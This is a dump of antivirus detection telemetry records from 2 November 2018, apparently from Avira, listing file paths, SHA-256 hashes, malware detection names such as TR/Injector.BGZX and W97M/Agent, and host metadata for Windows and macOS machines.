  Row(detection=Row(filename='avscan-20181102-050337-a0759308', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050337-A0759308', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055220-6eddb3da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055220-6EDDB3DA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052806-0bf7b986', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052806-0BF7B986', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051543-511e2011', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051543-511E2011', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001f7f', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001f7f', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061311-58783768', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061311-58783768', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082648-292010c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3c1d8bc1\\AVSCAN-20181102-082610-238DC1DA\\AVSCAN-20181102-082648-292010C6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:26:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052847-24a586ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052847-24A586CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.743\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.743\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:43:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092507-bca93724', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-092507-BCA93724', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='4badc1401f54853afb2ddb6af56587654b53373780a997941994a2641b4caf88', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061453-958d02c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061453-958D02C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050802-3e7a15f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050802-3E7A15F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061805-07c8390b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061805-07C8390B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061049-0401cb04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061049-0401CB04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052310-5bf858ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052310-5BF858AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055312-8dd3e28c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055312-8DD3E28C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061655-ddcda097', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061655-DDCDA097', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052343-6f4e5c08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052343-6F4E5C08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061617-c740a585', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061617-C740A585', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052641-d96537e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052641-D96537E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060629-690d81e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060629-690D81E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050440-c5e925c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050440-C5E925C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061957-4a7343e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061957-4A7343E0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054630-9e162abc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054630-9E162ABC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051647-7780613d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051647-7780613D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053015-59516d62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053015-59516D62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062700-469d07bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062700-469D07BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053037-6649462f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053037-6649462F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050848-59ba3af1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050848-59BA3AF1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052424-87ad433c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052424-87AD433C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052443-93474ad6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052443-93474AD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053640-3eb32430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053640-3EB32430', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060516-3d20d92d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060516-3D20D92D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060604-59b3d66c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060604-59B3D66C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052200-3220a4f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052200-3220A4F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051735-93c87f13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051735-93C87F13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053918-9ca13a36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053918-9CA13A36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054445-5fe7ed91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054445-5FE7ED91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062457-fd5b8e09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062457-FD5B8E09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:06:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062411-e1e5b1d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062411-E1E5B1D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054339-383058fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054339-383058FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051744-9944dc88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051744-9944DC88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050603-f7bdf446', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050603-F7BDF446', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052636-d67c99d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052636-D67C99D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051159-cbf7858f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051159-CBF7858F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:14:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053750-6870762c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053750-6870762C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051918-d1881dce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051918-D1881DCE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050301-8b2ded8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050301-8B2DED8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:37:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054344-3b6667bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054344-3B6667BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051924-d4c12e03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051924-D4C12E03', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053339-d2648595', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053339-D2648595', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:37Z'), dt=datetime.date(2018, 11, 2)),
